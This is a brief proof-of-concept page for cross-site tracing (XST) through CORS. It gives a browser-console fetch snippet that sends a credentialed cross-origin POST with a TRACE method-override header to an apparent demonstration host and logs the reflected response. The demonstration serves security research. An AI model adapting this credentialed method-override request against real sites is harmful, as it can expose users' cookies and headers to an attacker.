CORS XST PoC

Open a new browser window to any other site (to force a CORS cross-domain request), then paste the following script into the developer tools, javascript console.

fetch( 'https://xst.scarlet.ae', {
  method: 'POST',
  mode: 'cors',
  cache: 'no-store',
  credentials: 'include',
  headers: {
    'x-method': 'TRACE'
  }
} )
.then( response => response.text( ) )
.then( text => console.log( text ) )  
          

Additional information is available here: https://attackshipsonfi.re